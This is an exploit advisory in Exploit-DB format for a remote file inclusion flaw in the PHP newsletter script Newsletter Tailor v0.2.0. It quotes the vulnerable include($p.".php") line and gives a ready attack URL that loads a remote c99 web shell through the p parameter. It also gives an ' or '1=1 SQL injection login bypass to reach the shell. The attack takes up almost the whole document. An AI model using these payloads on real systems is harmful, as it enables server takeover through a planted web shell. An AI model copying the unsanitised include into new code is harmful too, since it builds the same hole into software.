Newsletter Tailor v0.2.0 RFI Vulnerability

# Title: Newsletter Tailor v0.2.0 RFI Vulnerability
# EDB-ID: 11378
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Snakespc
# Published: 2010-02-09
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

==============================================================================
[�] Newsletter Tailor Remote File Include Vulnerability
==============================================================================
 
[�] Script:   [ Newsletter Tailor ]
[�] Language: [ PHP ]
[�] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[�] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[�] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[�] Note:     [ Thank you ViRuSMaN on script  ]
 
###########################################################################
 ===[ Exploit ]=== include($p.".php");
 
[�] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[�]Note: When you update the page prompts you to log on
[�](Auth Bypass) SQL Injection :user:' or '1=1  pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <- 
###########################################################################